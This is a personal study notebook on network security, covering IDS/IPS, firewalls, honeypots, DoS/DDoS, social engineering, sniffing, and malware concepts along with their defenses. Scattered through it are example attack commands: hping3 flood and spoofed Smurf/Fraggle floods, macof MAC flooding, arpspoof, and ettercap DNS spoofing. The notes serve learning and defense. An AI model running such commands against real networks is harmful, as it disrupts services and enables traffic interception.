Angeles' code notepad

Coding notes

Angeles' code notepad

In

IDS and IPS

  • Definition: critical tools in network security:
    • IDS detects suspicious activities and generates alerts.
    • IPS detects and actively prevents threats by blocking malicious traffic.
Feature IDS IPS
Functionality Detects intrusions and generates alerts. Detects and actively blocks threats.
Action Passive (alert only). Active (blocks malicious traffic).
Placement Monitors network or host traffic. Directly in the traffic flow (inline).

  • Types:

    1. Network-Based (NIDS/NIPS):
      • Monitors all network traffic.
      • Deployed at network entry/exit points.
    2. Host-Based (HIDS/HIPS):
      • Monitors traffic on individual systems.
      • Installed on operating systems (e.g., servers).

  • Alert types: based on activity:

    • True Positive: Real attack detected, alert sent.
    • False Positive: Alert triggered, but no attack occurred.
    • True Negative: No attack, no alert.
    • False Negative: Real attack occurred, but no alert was triggered.

  • Tools:

    1. Snort : open-source IDS/IPS with customizable rules, monitors network traffic for known patterns (e.g., scans (Xmas scan, FIN scan), exploits).
    2. Zeek (formerly Bro): network security monitoring tool. , focuses on traffic analysis and anomaly detection.
    3. Suricata: advanced IDS/IPS that supports multi-threading. Often used with Snort rules for simplicity.
    4. YARA: detects malware by matching files against custom rules. Useful for identifying IOCs (Indicators of Compromise).

  • Evasion techniques:

    • Packet Fragmentation: splitting attack payloads into smaller packets.
    • Session Splicing: breaking payloads across multiple packets.
    • Decoys: using multiple sources to obscure the attacker’s identity.
    • Obfuscation: encoding payloads (e.g., Base64, Unicode).
    • DoS Attacks: overloading IDS/IPS to force failure (e.g., fail open).
    • Insertion Attacks: sending malformed packets to bypass detection.

Example: TTL Attacks

  1. Fragmented packets have varying TTL (Time to Live) values.
  2. Low TTL fragments get dropped by the network.
  3. Reassembled fragments bypass detection systems.
  • Defense strategies:
    • Baseline behavior: understand normal activity to detect anomalies.
    • Patch management: regularly update and patch IDS/IPS systems.
    • Rule tuning: adjust rules to minimize false positives.
    • Disallow lists: block known malicious behaviors and payloads.

Firewalls

Network security tool used to filter and control incoming and outgoing traffic based on predefined rules. They can be hardware, software, or both; they actcts as a “bouncer,” determining which traffic to allow or deny based on rules.

  • Firewalls lists: they filter traffic using allow/deny lists (whitelisting/blacklisting). Implicit Deny is a common security practice to block all traffic except explicitly allowed connections. There are 2 main types:

    • Allow List: allows specific trusted traffic and blocks all others.
    • Deny List: blocks specific untrusted traffic and allows all others. Used when you can’t identify all trusted sources but know certain threats.

  • Deployment Strategies:

    1. Gateway Firewalls: Deployed on routers to control access at the network perimeter.
    2. Bastion Hosts: Hardened devices that act as entry points into a network.
    3. DMZ (Demilitarized Zone):
      • A network segment that isolates public-facing servers (e.g., web servers) from internal networks.
      • Prevents direct access to internal systems from the internet.

  • Types of Firewalls:

    1. Packet filtering firewalls:
      • Operates at OSI Layer 3 (Network layer).
      • Filters based on IP addresses, protocols, and port numbers.
    2. Circuit-level gateways:
      • Operates at OSI Layer 5 (Session layer).
      • Verifies legitimate sessions before allowing traffic.
    3. Application layer firewalls : (e.g. WAFs block SQL injection attacks)
      • Operates at OSI Layer 7 (Application layer).
      • Filters traffic for specific applications like HTTP or FTP.
    4. Stateful firewalls :
      • Tracks the state of active connections.
      • Only allows traffic that is part of an established session.
    5. Next-Generation firewalls (NGFWs) : combines traditional firewall capabilities with advanced features like SSL inspection and intrusion prevention.
    6. Other Types:
      • Proxy firewalls: filter traffic by acting as an intermediary between clients and servers.
      • VPNs: provide encrypted tunnels that block unauthorized access.

  • Evasion Techniques:

    • Firewalking: Testing TTL values to probe firewall rules.
    • IP Spoofing: Faking source IP addresses to bypass rules.
    • Packet Fragmentation: Breaking packets into small fragments to evade detection.
    • Denial of Service (DoS): Overwhelming the firewall to make it fail open, allowing all traffic.
    • Tunneling Traffic: Hiding malicious data within legitimate traffic (e.g., HTTPS, DNS).
    • Proxies: Using a proxy server to bypass IP-based filtering.

  • Defense strategies:

    1. Implicit Deny: Block all traffic by default unless explicitly allowed.
    2. Ingress and Egress Rules: Ensure traffic is filtered both entering and exiting the network.
    3. Regular Updates: Apply security patches to prevent exploitation of vulnerabilities.
    4. Testing and Review: Periodically test and refine rules to ensure they are effective.
    5. Logging and Monitoring: Use SIEM solutions to monitor firewall activity and detect anomalies.

  • Implementing firewalls: follow layers model:

    • Network Layer (Layer 3): controls traffic based on IP addresses, protocols, and ports. Common in routers and standalone firewalls.
    • Transport Layer (Layer 4): filters traffic based on TCP/UDP port numbers and connection states. Used in stateful firewalls.
    • Application Layer (Layer 7): inspects the contents of packets for specific applications (e.g., HTTP, FTP). Used in application firewalls and web application firewalls (WAFs).

  • Evading firewalls

    • Firewalking: technique used to determine the rules of a firewall by sending packets with varying TTL values and analyzing the responses. It helps attackers map the firewall rules and identify open ports.
    • IP Spoofing: altering the source IP address of packets to impersonate a trusted host. This can bypass IP-based access controls and make malicious traffic appear to come from a legitimate source.
    • Fragmentation: involves breaking a packet into smaller fragments to evade detection by firewalls that do not reassemble fragmented packets before inspection. This can bypass filters that detect specific patterns in larger packets.
    • Tunneling: encapsulates one type of traffic within another protocol to bypass firewalls. Common examples include using HTTP or DNS to tunnel other types of traffic, making it appear as normal web or DNS traffic to evade firewall rules.

Honeypots

Environments that attract and trap attackers by mimicking real systems or data. They allow administrators to monitor and analyze attacker behavior without risking real systems.

  • Types by interaction levels:

    • Low Interaction: simulates only basic services and interactions. Minimal engagement with attackers (e.g. a simple web server that logs attempted connections and basic interactions).
    • Medium Interaction: provides more realistic services and interactions. Engages attackers longer but still does not mimic a full operating system (e.g. a virtual machine that simulates a range of services like FTP, SSH, and HTTP, allowing attackers to perform more extensive actions).
    • High Interaction: fully functional systems that mimic real production environments. Engages attackers for extended periods, providing deep insights (e.g. complete operating system set up with real applications and data to observe complex attack patterns).
    • Pure Interaction: real systems used as honeypots. No simulation; attackers interact with actual operating systems and services (a real server with a standard OS and applications deployed as a honeypot to gather comprehensive data on attacker methods).

  • Varieties:

    • Client honeypots: simulate client-side applications to detect malicious servers (e.g. a web browser honeypot that visits websites to identify drive-by downloads and other client-side attacks).
    • Database honeypots: mimic database systems to attract attackers targeting database services (e.g. a fake MySQL server designed to log SQL injection attempts and unauthorized access attempts).
    • Spam honeypots: designed to attract and collect spam messages for analysis (e.g. an email server that accepts all incoming messages to gather spam for studying spammer tactics and origins).
    • Malware Honeypots: attract and capture malware to study its behavior and propagation (e.g. a virtual environment that allows malware to infect it, recording the malware’s actions and analyzing its impact and communication patterns).

In

DoS and DDoS attacks

  • Definition: DOS (Denial of Service) and DDoS (Distributed Denial of Service) attacks aim to prevent services from being accessible.

    • DOS: (Single attacker) makes a service (e.g., web server, FTP) inaccessible to legitimate users.
    • DDoS: (Multiple attackers, harder to defend) nvolves multiple attack points (botnets) targeting the same service.

  • Techniques:

    1. Volumetric attacks: epletes the bandwidth of the target by flooding it with large amounts of data.
      • Amplification attacks: attack data grows larger than the original request (UDP flooding, ICMP flooding, Ping of Death, Smurf attacks).
      • Pulse wave attacks: particularly effective in hybrid cloud environments.
    2. Protocol attack: targets the protocols themselves (e.g., TCP).
      • SIN Flood: floods with SYN packets, exploiting the three-way handshake in TCP.
      • ACK Flood: sends ACK packets, overwhelming the target.
      • Fragmentation attacks: breaks packets into smaller pieces to exhaust the system.
    3. Application layer attacks: aimed at the application layer (like web servers. e.g. Slowloris Attack keeps the connection open, consuming server resources without closing it).
      • UDP application layer flood: utilizes UDP protocol to flood application layers with requests, causing resource starvation.
    4. Multi-Vector attacks, combinings multiple attack vectors.

  • Edge cases:

    • Permanent Denial of Service: malware can destroy the hardware or data, making the service permanently unavailable (e.g., bricking a device by corrupting BIOS).
    • Reflective Denial of Service Attacks: the attacker uses a third party (e.g., a server) to attack the victim, making it appear that the attack is coming from someone else.

  • Tools:

    • LOIC (Low Orbit Ion Cannon)*:
      • Purpose: open-source network stress testing and DoS attack tool.
      • Use: generates high traffic to target services.
    • HOIC (High Orbit Ion Cannon):
      • Purpose: advanced version of LOIC, used for DDoS attacks.
      • Features: aan target multiple URLs simultaneously.
    • Hping3:
      • Purpose: Network packet generator and analyzer.
      • Use: Can craft custom packets for security testing, including DoS attacks.

Volumetric attacks

Volumetric attacks are a category of Denial of Service (DoS) attacks that focus on overwhelming the bandwidth or resources of a network, application, or server. These attacks generate massive traffic to flood and exhaust the resources, causing legitimate requests to be denied.

  • Key characteristics:

    • High Traffic Volume: the attack aims to generate a massive volume of traffic, often in the form of requests or data packets, to overwhelm a target.
    • Network or Application-Level Impact: these attacks can affect both network infrastructure and application performance.
    • Resource Exhaustion: the goal is to consume all available resources (e.g., bandwidth, CPU, memory), rendering the service unavailable.

  • Types:

    • UDP Flood: Sends large volumes of UDP packets to random ports on a target server, consuming bandwidth and resources (e.g hping3 --udp -p 80 -i u1 192.168.1.1).
    • ICMP Flood (Ping Flood): Floods the target with ICMP Echo Request packets, consuming the network bandwidth (e.g. hping3 --icmp -i u1 192.168.1.1).
    • DNS Amplification: Exploits DNS servers to amplify the attack traffic, sending a small query that generates a large response, overwhelming the target.
    • NTP Amplification: Similar to DNS amplification but uses NTP servers to flood the target with responses.
    • HTTP Flood: Sends a large number of HTTP requests to a web server, attempting to exhaust its resources or overload the network.
    • Smurf Attack: Exploits the ICMP protocol by sending a small ping request to a network’s broadcast address, with the source address spoofed to that of the target. All devices in the network reply to the spoofed address, flooding the target with traffic (e.g. hping3 --icmp -a 192.168.1.1 --broadcast 192.168.1.255).
    • Fraggle Attack: Similar to the Smurf attack, but it uses UDP packets (typically to port 7 or 19, which are associated with echo and chargen services). The attacker sends a request to a broadcast address with the source address spoofed to the target, and all devices on the network respond, amplifying the traffic directed at the target (e.g. hping3 --udp -a 192.168.1.1 --broadcast -p 7 192.168.1.255).
    • Pulse Wave Attack (extra): involves sending short bursts or pulses of high traffic at regular intervals to overwhelm a target’s defenses. This type of attack aims to bypass traditional DDoS defenses by rapidly fluctuating the intensity of the attack (e.g. burst of hping3 --flood -p 80 192.168.1.1 -i u100).

Protocol attacks

Taking advantage of the TCP protocol (3-step handshake). They consume resources like connection state tables present in the network infrastructure components such as load-balancers, firewalls, and application servers

  • Techniques:

    • SYN flood attack: takes advantage of a flaw with regard to how most hosts implement the TCP three-way handshake. This attack occurs when the intruder sends unlimited SYN packets (requests) to the host system. The process of transmitting such packets is faster than the system can handle. Normally, the connection establishes with the TCP three-way handshake, and the host keeps track of the partially open connections while waiting in a listening queue for response ACK packets.
    • Fragmentation attack: these attacks send fragmented packets that exploit vulnerabilities in the target’s packet reassembly process, causing crashes or resource exhaustion.
    • Spoofed session flood attack
    • ACK flood attack: attackers overwhelm servers by sending a massive number of TCP ACK packets, forcing the server to process these packets unnecessarily.
    • Ping of Death: by sending oversized ICMP packets, attackers can crash or freeze the target system due to buffer overflows.

  • Impacts:

    • Exhaustion of resources: targets can run out of available connections, memory, or processing power.
    • Disrupted services: legitimate users cannot access the network or application during the attack.
    • Performance degradation: even partial success in a protocol attack can slow down network performance significantly.
    • Operational costs: mitigating such attacks often requires costly infrastructure upgrades or third-party services.

  • Mitigations:

    • Web Application Firewalls (WAFs).
    • Stateful Firewalls.
    • Rate Limiting:
    • Deep Packet Inspection (DPI).
    • Anycast Networks.
    • Traffic Scrubbing Services.
    • Connection Timeouts and Limits.

Application layer attacks

They consume application resources or services, thereby making them unavailable to other legitimate users

  • Attack techniques:

    • HTTP GET/POST attack: threat actors send a large number of HTTP requests to a web server within a short span. This consumes resources and denies legitimate requests. Such attacks are difficult to distinguish from legitimate traffic.
    • Slowloris attack: involve sending partial HTTP requests to a server. This keeps connections open for as long as possible, and as a result, the server becomes overwhelmed. This eventually leads to denial of requests for many legitimate requests.
    • UDP application layer flood attack: sending numerous requests that can overwhelm the server, especially when it’s not properly configured to handle such traffic.
    • DDoS extortion attack: threaten to launch an application layer attack unless a ransom is paid. This can involve overwhelming the application with requests until the victim complies.

  • Mitigations:

    • Web Application Firewalls (WAFs)
    • Behavioral Analytics and Machine Learning
    • Rate Limiting and Throttling
    • CAPTCHA and JavaScript Challenges
    • IP Reputation Filtering and Rate Limiting
    • Cloud-based Mitigation Solutions

Botnets

“Robot Network”, a disperse group of compromised and remote controlled systems. IoT lack of security made it easy. Not only used for DdoS: also automated polls or cryptomining.

  • Require Internet connection, they can spread comrpomising more machines through internal networks.

DoS and DDoS countermeasures

  • Mitigations:

    • Traffic filtering: implement filtering solutions such as rate limiting and blocking suspicious traffic.
    • Content Delivery Networks (CDNs): CDNs can absorb high volumes of traffic, distributing the load across multiple servers.
    • Intrusion Prevention Systems (IPS): use IPS to detect and block attack traffic before it reaches critical systems.
    • Anti-DDoS solutions: dedicated services or appliances designed to detect and mitigate DoS/DDoS attacks.
    • Rate Limiting: restrict the number of requests a client can make to a server within a certain time frame to reduce the attack’s effectiveness.

  • Challenges in defense:

    • Volume and complexity: the sheer scale of the attack can overwhelm defenses, especially without prior detection and mitigation plans.
    • Botnets: volumetric attacks often use large botnets to generate traffic, making it difficult to distinguish malicious traffic from legitimate traffic.
    • Increased latency: while mitigating these attacks, organizations may experience increased latency or degraded performance for legitimate users.

  • Detection:

    • Traffic anomalies: monitoring for sudden spikes in traffic volume or unusual patterns can help detect volumetric attacks early.
    • Behavioral analysis: analyzing baseline traffic patterns and looking for deviations from normal behavior can be an effective detection method.
    • Rate of requests: unusual increases in the rate of requests to a particular service or endpoint may indicate an ongoing volumetric attack.

In

Social engineering concepts and attacks

Social engineering involves manipulating individuals to reveal confidential information or provide unauthorized access. Attackers exploit trust, fear, and ignorance to achieve these goals.

  • Common targets

  • Help desk & Support staff: they have access to sensitive systems and data.

  • Admins & IT ersonnel: often hold higher access levels.

  • Executives (C-Level): have access to critical organizational resources.

  • Anyone with Desired Access: attackers target individuals with access, regardless of role.

  • Techniques:

  • Framing & pretexting: making lies believable through authority or familiarity.

  • Types of framing:**

    • Negative: authority, social pressure, urgency.
    • Positive: trust-building, helpfulness.

  • Phases:

    1. Research: gather details about the target.
    2. Target selection: identify individuals with required access.
    3. Relationship building: gain trust or rapport.
    4. Exploitation: use the relationship to gain access or sensitive information.

  • Types of aocial:

    • Human-based:
      • Piggybacking: gaining access by following an authorized person.
      • Tailgating: entering a restricted area without authorization.
      • Dumpster Diving: searching trash for confidential information.
      • Impersonation, Vishing, and Eavesdropping.**
    • Computer-based:
      • Phishing: trick targets into clicking malicious links or sharing credentials.
      • Spear phishing: targeted attacks on specific individuals or departments.
      • Whaling: targeting high-profile individuals like executives.
      • Smishing: phishing over SMS.

  • Countermeasures:

    • Security awareness training: regular training on social engineering tactics.
    • Mock phishing campaigns: test employee awareness and response.
    • Anti-phishing tools: toolbars and detection systems.
    • Visitor check-in: control building access with visitor logs and badges.
    • Physical security: locks, RFID badges, and proper garbage disposal.
    • Strong security policies: enforce password policies, multi-factor authentication, and restricted access zones.

Insider threats

Insider threats involve individuals within an organization who misuse their trusted access, intentionally or unintentionally, to cause harm or security risks.

  • Type:

    1. Disgruntled employees: employees seeking revenge due to perceived mistreatment or termination.
    2. Negligent insiders: individuals who unintentionally cause harm by neglecting security protocols (e.g., mishandling passwords).
    3. Professional insiders: individuals hired or compromised to deliberately gather or exfiltrate data.
    4. Compromised insiders: individuals coerced, blackmailed, or financially influenced to act against the company.

  • Motivation:

    • Revenge: driven by personal grievances against the organization.
    • Financial Gain**: Compromised insiders may be influenced by financial incentives or debt.
    • Competitive advantage: competitors might embed insiders to access trade secrets.
    • Hacktivism: motivated by ethical or moral beliefs, intending to harm organizations perceived as unethical.
    • Coercion: insider pressured through blackmail or threats.

  • Indicators:

    • Unusual data access: large amounts of sensitive data accumulated or moved.
    • Odd ñogin times: access outside normal working hours or from multiple devices simultaneously.
    • Physical access attempts: unusual activity near restricted areas, like server rooms.
    • Behavioral changes: employees acting secretive or displaying unusual work patterns.

  • Defenses:

    1. Monitoring and logging: track access to sensitive data and alert unusual activities.
    2. Background checks**: conduct checks before providing access, especially for sensitive roles.
    3. User account termination policy: disable accounts immediately upon termination.
    4. Role-based access and least privilege: limit data and system access based on roles.
    5. Separation of duties: divide responsibilities to prevent one individual from having too much control.
    6. Forced vacations: require time off to observe if issues arise in an employee’s absence.

  • Tools for detection:

    • Regularly review access logs and set alerts for abnormal activities.
    • Conduct routine background checks, especially for roles requiring high-level access.
    • Implement strict policies for access and review permissions regularly.

Identity theft

Identity theft involves impersonating someone’s identity, typically in digital form, to commit fraud or other malicious activities. Attackers may steal digital or physical information to assume another’s identity for financial gain, criminal activity, or personal advantage.

  • Motivations:

    • Financial gain: stealing personal info to commit fraud, open credit lines, or steal tax refunds.
    • Avoiding detection: using a stolen identity to commit crimes without being traced.
    • Framing victims: using someone else’s identity to place blame on them.
    • Gaining access: using another’s identity to bypass restricted access or gain legitimacy.

  • Commonly targeted information:

    • Standard IDs: social security numbers, driver’s licenses, tax info.
    • Financial details*: banking information, credit/debit card data.
    • Insurance and benefits info: personal details for health, life, or other insurance.
    • Children’s Information: often exploited for credit fraud as it may go unnoticed for years.

  • Methods:

    1. Physical theft: stealing wallets, purses, or personal devices.
    2. Open Source Intelligence (OSINT): gathering publicly available information to impersonate someone.
    3. Social engineering: phishing, shoulder surfing, and dumpster diving to acquire sensitive data.
    4. Digital hacking: compromising systems, installing keyloggers, or hacking into unsecured devices.
    5. Mail theft: stealing physical mail to gain sensitive information.

  • Indicators:

    • Unfamiliar charges: unknown purchases or withdrawals on statements.
    • Missing mail: sudden lack of statements or bills, or receiving unfamiliar bills.
    • Debt collection notices: unexpected contact from debt collectors.
    • Credit report changes: changes in credit scores or history without known cause.
    • Tax filing issues**: attempting to file taxes and finding they were already filed.

  • Prevention tips:

    • Monitor financial activity: regularly check bank statements and use credit monitoring services.
    • Secure physical mail**: collect mail daily and secure important documents.
    • Use strong security practices: enable multi-factor authentication, use strong passwords, and consider password managers.
    • Limit information sharing: avoid oversharing personal info on social media.
    • Be cautious with unknown contacts: avoid answering unknown calls and verify unexpected communication.

In

Network sniffing

  • Definition:

  • Straightforward in hub-based networks, as the traffic on a segment passes through all the hosts associated with that segment. However, most networks today work on switches. A switch is an advanced computer networking device. The major difference between a hub and a switch is that a hub transmits line data to each port on the machine and has no line mapping, whereas a switch looks at the Media Access Control (MAC) address associated with each frame passing through it and sends the data to the required port. A MAC address is a hardware address that uniquely identifies each node of a network.

  • Packet sniffers are used to convert the host system’s NIC to promiscuous mode. The NIC in promiscuous mode can then capture the packets addressed to the specific network.

  • Types:

    • Passive Sniffing: does not require any packets to be sent. It only captures and monitors the packets flowing in the network.
    • Active Sniffing:searches for traffic on a switched LAN by actively injecting traffic into the LAN; it also refers to sniffing through a switch (Port mirroring).
      • Active sniffing involves sending out multiple network probes to identify access points. The following is the list of different active sniffing techniques:
      • MAC Flooding: Involves flooding the CAM table with fake MAC address and IP pairs until it is full
      • DNS Poisoning: Involves tricking a DNS server into believing that it has received authentic information when, in reality, it has not
      • ARP Poisoning: Involves constructing a large number of forged ARP request and reply packets to overload a switch
      • DHCP Attacks: Involves performing a DHCP starvation attack and a rogue DHCP server attack
      • Switch port stealing: Involves flooding the switch with forged gratuitous ARP packets with the target MAC address as the source
      • Spoofing Attack: Involves performing MAC spoofing, VLAN hopping, and STP attacks to steal sensitive information

  • Basic attacks:

    • *AC flooding using macof: technique used to compromise the security of network switches that connect network segments or network devices. Attackers use the MAC flooding technique to force a switch to act as a hub, so they can easily sniff the traffic.
      • macof, from dsniff is a Unix and Linux tool that is a part of the dsniff collection. It floods the local network with random MAC addresses and IP addresses, causing some switches to fail and open in repeating mode, thereby facilitating sniffing. This tool floods the switch’s CAM tables (131,000 per minute) by sending forged MAC entries. When the MAC table fills up, the switch converts to a hub-like operation where an attacker can monitor the data being broadcast (macof -i eth0 -d [Target IP Address]).
    • VLAN hopping attack: attacking host on a VLAN (Virtual LAN, the share network) to gain access to traffic on other VLANs. You may use Frogger.
      • Switch spoofing: attacking host imitates a trunking switch.
      • Double tagging:
        1. Attacker prepends two VLAN tags to frames.
        2. Second tag is the target host.
        3. First switch removes first innocent VLAN tag and sends packet to second switch.
        4. Allows bypassing security mechanisms and reaching the target hosts.
        5. Replies are not forwarded to the attacker host.
    • STP (Spanning Tree Protocol) attack:
      • Definition: An attack on the Spanning Tree Protocol (STP, protocol that ensures a loop-free topology in Ethernet networks by prevents network loops that can occur in redundant switch configurations) to manipulate the network topology. It uses BPDU (Bridge Protocol Data Units) to communicate between switches and select a root bridge, determining the shortest path and disabling redundant links.
      • Method: An attacker sends spoofed STP BPDUs (Bridge Protocol Data Units) to become the root bridge.
      • Effect: Can reroute traffic through the attacker’s device, enabling data interception and network disruption.

DHCP sniffing attacks

An attacker floods the DHCP server by sending a large number of DHCP requests and uses all available IP addresses that the DHCP server can issue. As a result, the server cannot issue any more IP addresses, leading to a Denial-of-Service (DoS) attack. Because of this issue, valid users cannot obtain or renew their IP addresses, and thus fail to access their network. This attack can be performed by using various tools such as Yersinia and Hyenae.

  • DORA process refers to the 4 step communication for a device to get IP assigned from a DHCP server which are DISCOVER, OFFER, REQUEST, ACKNOWLEDGE.

  • Attacks:

    1. DHCP Starvation Attack

      • Definition: an attacker sends numerous DHCP requests with spoofed MAC addresses to exhaust the DHCP server’s pool of IP addresses.
      • Effect: legitimate clients cannot obtain IP addresses, leading to denial of service.
      • Method: the attacker uses tools like dhcpstarv to automate the process of sending fake DHCP requests.

    2. DHCP Spoofing Attack:

      • Definition: an attacker sets up a rogue DHCP server on the network to respond to DHCP requests from clients.
      • Effect: the rogue server can assign malicious IP addresses, gateways, or DNS servers, redirecting traffic and intercepting data.
      • Method: the attacker listens for DHCP requests and responds faster than the legitimate DHCP server.

    3. DHCP Lease Hijacking:

      • Definition: an attacker monitors the network for DHCP requests and responses, then sends a DHCP request to lease an IP address intended for a legitimate client.
      • Effect: the attacker can impersonate the legitimate client, intercepting their traffic and gaining unauthorized access.
      • Method: the attacker needs to be quick to send the request before the legitimate client.

  • Tools:

    • Yersinia: network tool that can launch various DHCP attacks, including spoofing and starvation. It takes advantage of weaknesses in different network protocols such as DHCP. It pretends to be a solid framework for analyzing and testing the deployed networks and systems (yersinia -I )
    • dhcpstarv: automates DHCP starvation attacks.
    • dhcpxflood: Another tool for flooding a network with DHCP requests.

ARP poisoning

  • ARP is the Address Resolution Protocol: it resolves IP addresses to MAC addresses and cCan be used for obtaining MAC addresses of devices on the network.

    • Packets are ARP_REQUEST and ARP_REPLY.
    • Commands:
      • arp -a: displays current ARP cache.
      • arp -d *: clears ARP cache.

  • ARP table: used to map MAC addresses to ip addresses. Every network interface has its own ARP table.

    • If no ARP entry exist:
      1. Computer A broadcasts an APR request in network asking for the MAC address from a specific IP.
      2. Computer B replies its MAC and IP address
      3. Computer A inserts it to its ARP table for future use

  • ARP spoofing: method of attacking an Ethernet LAN. ARP spoofing succeeds by changing the IP address of the attacker’s computer to the IP address of the target computer. A forged ARP request and reply packet find a place in the target ARP cache in this process. As the ARP reply has been forged, the destination computer (target) sends the frames to the attacker’s computer, where the attacker can modify them before sending them to the source machine (User A) in an MITM attack.

  • Tools: arpspoof from dsniff: redirects packets from a target host (or all hosts) on the LAN intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch.

    1
    2
    3
    arpspoof -i eth0 -t 10.10.1.1 10.10.1.11 
    # -i: specifies network interface
    # -t: specifies target IP address

DNS poisoning

DNS Poisoning, also known as DNS Cache Poisoning, is an attack technique used to redirect traffic from a legitimate domain to a malicious IP address. This allows attackers to capture sensitive information or perform phishing attacks. It exploits the DNS resolution process, manipulating DNS cache or settings.

  • DNS resolution process:

    1. Local check: the machine checks if it is the requested domain.
    2. Resolver cache: checks the cached DNS entries stored locally.
    3. Host file: checks entries in the host file (e.g., /etc/hosts).
    4. DNS server: if not found locally, the query is sent to the configured DNS server, which may query higher-level authoritative servers.

  • Attack Techniques:

    1. Host file modification: Malware or an attacker may edit the local host file to redirect domains.
    2. Malicious DNS server configuration: Attackers configure malicious DNS servers using DHCP responses, setting a malicious IP for DNS queries.
    3. Cache poisoning: Injects fake DNS records into the resolver cache, causing repeated redirections to attacker-controlled sites.

  • Tools for DNS poisoning:

    • Ettercap: commonly used for man-in-the-middle attacks, DNS spoofing, and other network-based attacks.
      1
      2
      3
      4
      5
      # clear cache before on Windows
      Ipconfig /flushdns
      # after editing etter.dns file to set malicious DNS responses
      # finally capture and manipulate requests
      sudo ettercap -T -q -i <interface> -P dns_spoof -M arp // //
    • DerpNSpoof a lightweight command-line tool for DNS spoofing and poisoning.
    • Bettercap: an alternative to Ettercap, providing DNS spoofing features.

Mitigations

  • Use DNSSEC: prevents unauthorized changes to DNS records by authenticating responses.
  • Enable DNS Security Features: such as DNS filtering and validation checks.
  • Secure DNS Settings: ensure DNS configurations are secure, preventing unauthorized modifications.

Sniffing defenses

  • Restrict the physical access to the network media
  • Encryption is, by far, the best option.
  • Use Access Control Lists (ACLs) on router/firewall to only allow authorized devices/IP ranges.
  • Permanently add the MAC address of the gateway to the ARP cache.
  • Use static IP addresses and static ARP tables.
  • Use switch instead of hub as switch delivers data only to the intended recipient.
  • Use PGP and S/MIPE, VPN, IPSec (ryptographic tunnel protocol), SSL/TLS, Secure Shell (SSH), One-time passwords (OTP).
  • Retrieve MAC directly from NIC instead of OS to prevent MAC address spoofing.
  • Use tools to determine if any NICs are running in the promiscuous mode.

In

Malware concepts and components

Short for “malicious software.” It refers to any software that performs harmful actions on a computer system or network. It can take various forms, and while all viruses are malware, not all malware are viruses.

  • Common types:

    • Trojan: appears innocuous or even useful but contains hidden malicious code (e.g., like a Tootsie Pop with smallpox inside).
    • Virus: malicious program that spreads through human interaction (e.g., email attachments, USB drives). It spreads when shared with others.
    • Worm: similar to viruses but can propagate itself without human interaction. Worms often exploit vulnerabilities like remote code execution (RCE).
    • Ransomware: encrypts a victim’s data and demands payment (often in Bitcoin) for decryption. Example: WannaCry.
    • Adware: software that displays unwanted advertisements, often gathering data on your habits. It may not be strictly malicious but is often annoying and invasive.
    • Spyware: gathers information about users without consent, typically for advertising purposes.

  • Components:

    • Downloader: non-malicious program that downloads harmful files from the internet.
    • Dropper: contains malicious code and installs malware onto the target system.
    • Obfuscator: makes the malware code unreadable to prevent detection by security systems.
    • Cryptor: encrypts malware code to prevent analysis; the code must be decrypted to understand its function.
    • Payload: actual malicious action the malware carries out (e.g., encrypting files, exfiltrating data).
    • Exploit: known vulnerability in software that malware may use to spread (e.g., EternalBlue used by WannaCry).

  • Propagation methods:

    1. Email Attachments: A common way for malware to spread is via malicious email attachments or links.
    2. Software Installations from Untrusted Sources: Downloading software from torrents or other untrusted sources can lead to malware infections.
    3. Exploiting Software Vulnerabilities: Malware can use known vulnerabilities in software to spread automatically (e.g., EternalBlue in WannaCry).

  • Real-world examples

    • Ransomware: targets industries like healthcare and education. The shift from encrypting files to exfiltrating data and threatening to release it on the dark web is becoming more common.
    • Famous malware: BlackEnergy, Cryptolockers, and the Equation Group. A GitHub repository, “thezoo,” hosts a variety of real-world malware samples for analysis (e.g., Fancy Bear, Petya, WannaCry).

APT

Advanced Persistent Threats (APTs) are sophisticated, persistent, and malicious cyber threats typically orchestrated by well-organized groups. These groups are highly skilled and have specific objectives such as data exfiltration, espionage, or financial gain. APTs may use malware specifically developed for their campaigns, such as custom zero-day exploits Some APTs may also be associated with state-sponsored activities, such as Stuxnet, which was a state-sponsored malware but not considered an APT.

  • Key characteristics:

    • Advanced: high-level skills and custom exploits are often used.
    • Persistent: they maintain long-term access to the target systems.
    • Threat: their goal is to execute malicious activities without being detected.

  • Groups: see MITRE APT Groups.

    • APT28 (Fancy Bear): Russian hacking group.
    • Lazarus Group (APT38): North Korean group.
    • Lapsus: non-state-sponsored group, notable for hacking companies like Okta and Nvidia.

  • Targets:

    • Sensitive Information: personal or state secrets, intellectual property, and financial data.
    • Corporate Espionage: stealing research and development information to gain a competitive advantage.
    • Political Goals: activists may engage in politically motivated attacks.

  • Behavior:

    • Long-Term Access: APTs aim to stay undetected for as long as possible, often going unnoticed until they strike.
    • Patience: Attackers are methodical and patient, gathering intelligence over time before launching their attack.
    • High Skill Level: attackers are highly skilled in areas such as zero-day exploit development, evading detection, and using multi-stage attacks.

  • Lifecycle:

    1. Preparation:
      • Target Selection: intelligence gathering and testing tools for evading detection.
      • Tool Creation: developing custom malware and testing against security defenses (EDRs, AV).
    2. Initial Intrusion: deploying malware and establishing a connection to the target system.
    3. Expansion: gaining further access by acquiring credentials and expanding across the network.
    4. Persistence: maintaining long-term access through various persistence techniques.
    5. Exfiltration: gathering and transferring sensitive information to external systems controlled by the attackers.
    6. Cleanup: covering tracks by erasing log files and removing evidence of the intrusion.

Trojans

  • Definition: type of malware that masquerades as legitimate software but contains a malicious payload. The name is derived from the Greek myth of the Trojan Horse, where enemies hid inside to infiltrate the city. In the case of Trojans, the “horse” is digital.

    • Function: Malicious software disguised as a legitimate program to trick users into installing it.
    • Propagation: Does not self-replicate; relies on social engineering to spread.

  • Dessign: there are different types of malicious software designed to install other malware on a target system. Here’s a brief explanation of the differences between them:

    • Dropper:
      • Function: a dropper is a type of malware designed to install another malicious payload on the victim’s system. It typically carries the malicious payload within its own code.
      • Operation: once executed, the dropper extracts and installs the payload directly onto the system.
      • Payload Delivery: the payload is usually embedded within the dropper itself, making it a self-contained malware delivery mechanism.
    • Downloader:
      • Function: A downloader is a type of malware that, upon execution, retrieves additional malicious software from the internet or another network location.
      • Operation: The downloader contacts a remote server to download the additional malware, which it then installs on the system.
      • Payload Delivery: Unlike droppers, downloaders do not contain the malicious payload initially; they fetch it from an external source after being executed.
